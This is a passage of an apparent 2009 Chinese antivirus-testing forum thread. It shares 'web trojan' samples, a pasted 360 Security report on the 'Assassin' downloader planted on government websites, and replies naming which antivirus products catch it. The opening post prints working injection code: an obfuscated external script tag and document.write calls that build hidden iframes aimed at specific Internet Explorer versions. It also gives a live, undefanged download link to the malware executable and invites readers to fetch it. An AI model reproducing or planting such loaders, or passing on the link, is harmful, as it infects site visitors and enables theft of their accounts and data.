最疯狂网马一堆

dayang1717

<script src=http://%6D%62%72%39%2E%63%6E></script>

document.write("<div style='display:none'>")
document.write("<iframe src=http://z.hg973.cn/d1/16/index.htm width=100 height=0></Iframe>")
document.write("</div>")

<br>
<br>
<br>
<iframe src=index2.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<script src='http://w.cnzz.com/c.php?id=30014829&l=1' language='JavaScript' charset='gb2312'></script>
<script language="JavaScript" charset="gb2312" src="http://count7.51much.com/cnt.php?uid=UA-1-12945&style=text&text=网站统计"></script>



<script src="zhin.js"></script>
<script src="zhin1.js"></script>
<html>
<script>
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=yt14.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytqm.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytfl.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytvod.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=ytxxz.htm width=100 height=0></iframe>");
</script>
</html>



http://w1.ys8c.com/01/s.exe

就他了，大家自己下
顺便说下，这个东西很强，强在他有有效的数字签名，汗~！

刚在360那里看了报告了，原来抓了个强毒！


“刺客”狂借政府网站大肆传播木马来源：360安全中心    发布日期：2009-04-15    共42条回复能“隐身”还会玩“自杀” “刺客”狂借政府网站大肆传播木马

　　4月14日，360安全中心截获了一个通过“挂马”地方政府网站疯狂传播木马的木马下载器。这个名为“刺客”的木马下载器，竟然在短短几天内，先后“攻陷”了包括山西省公安厅交通管理局、楚雄纪检监察网、郴州人事信息网、中国林业科研网、衡阳市住房公积金管理中心、焦作价格信息网等数十家政府网站服务器，并通过网页“挂马”的方式大肆传播木马，对访问这些网站的用户电脑形成了极大的安全威胁。

　　据奇虎360安全专家石晓虹博士介绍，“刺客”木马下载器具有关闭杀毒软件、自我伪装、下载并运行其他木马等强大的恶意行为。当用户点击这些“挂马”网页时，“刺客”首先会伪造一个微软的数字签名，让安全软件误以为它是正常程序。随后，“刺客”在会在指定目录下释放并执行一个恶意程序模块“killdll.dll”，该恶意模块可在“隐身”状态下关闭系统内所有主流安全软件。最后，该恶意模块主动自我删除——就在其“自杀”的同时，居然生成一个新的可升级的后门程序！

　　石晓虹博士说，“刺客”在干完了所有这一切之后，所有安全软件基本上就处于失效状态，而此时“刺客”已经获得了对中招电脑的控制权。随后，它就可以不慌不忙地去登陆黑客服务器下载一个包含有大量恶意网址的文件（hxxp://g.qv778.com/01/fz.txt），并按照该文件的“指示”，批量下载并执行该文件里的木马和恶意程序，进而就能更加随心所欲地窃取中招电脑中的账号、密码以及个人隐私等信息，甚至会“指挥”这些“肉鸡”电脑去作恶。

　　从近期360安全中心、瑞星、金山等各安全厂商公布的疫情播报数据来看，无论从在数量上还是危害程度上，木马和网页木马都已远超病毒，成为当前互联网最大的安全威胁。而超过95%的木马就是通过“网站挂马”这种方式来传播的。由于不少地方政府网站的服务器维护与内容更新均交给第三方公司进行，部分管理员的安全意识薄弱，因此这些流量虽不太大、但可信度极高的地方政府网站目前已成为黑客与木马传播者们攻击和“挂马”的首选目标，有些网站甚至长期被“挂马”，成了不折不扣的网络“毒源”。

　　针对日益严重的“挂马”威胁，360安全中心强力推出“全民联防”计划，号召全体网民携手对抗木马产业链。该计划在国内外首次将搜索引擎技术应用到安全领域，结合360安全卫士2亿客户端用户的样本上报数据，在数千台服务器的海量计算支持下，在最短时间内为所有用户提供反木马安全支持。因此，360安全卫士已经成为最权威、最有效的反木马软件。

附：
4月14日360安全中心监测到的被挂有“刺客”木马下载器的部分政府网站名单：（备注：为防用户误点，以上网址已作特殊处理。）

山西省公安厅交通管理局
hxxp://www.shanxijiaojing.com/old/index.asp 被挂木马：w1.akc8.com/01/s.exe

楚雄纪检监察网
hxxp://www.cxjjjc.gov.cn/hfrx/index.asp?page=6 被挂木马：w1.akc8.com/01/s.exe

郴州人事信息网
hxxp://www.czpb.gov.cn/2007/Article/Class1/Index.html被挂木马：w1.akc8.com/01/s.exe

衡阳市住房公积金管理中心
hxxp://www.hygjj.gov.cn 被挂木马：w1.akc8.com/01/s.exe

吉林市船营区人口和计划生育信息网
hxxp://www.cyqpop.gov.cn/被挂木马：w1.akc8.com/01/s.exe

焦作价格信息网
hxxp://www.jzjgxx.gov.cn/index.asp被挂木马：w1.akc8.com/01/s.exe

吉林区划地名网
hxxp://www.jlmz.gov.cn/被挂木马：w1.akc8.com/01/s.exe

中国林业科研网
hxxp://www.caf.ac.cn/caf/detail.cfm?file=79954被挂木马：w1.akc8.com/01/s.exe

黄河农网
hxxp://www.hhnw.com/dzhb/detail.asp?id=102757&mykindname=????&typeid=52 被挂木马：w1.akc8.com/01/s.exe

中国植保植检网
hxxp://www.ppq.gov.cn/nzwbch/default.html 被挂木马：w1.akc8.com/01/s.exe

[ 本帖最后由 dayang1717 于 2009-4-15 21:21 编辑 ]

花间酒

红伞杀。

教父

卡巴斯基拦截下载，提示病毒，呵呵

Palkia

js 0

黑衣~魂

TO DW

x442437515

微点拦截，杀

utfhv

KV09杀

hddu

2009-04-12 16:46:40    创建文件      操作:阻止并结束进程
进程路径:E:\s\s.exe
文件路径:C:\WINDOWS\system32\killdll.dll
触发规则:所有程序规则->WINDOWS_2->%windir%\system*\*.dll

ldy144028

rs 0

chester9999

IK杀！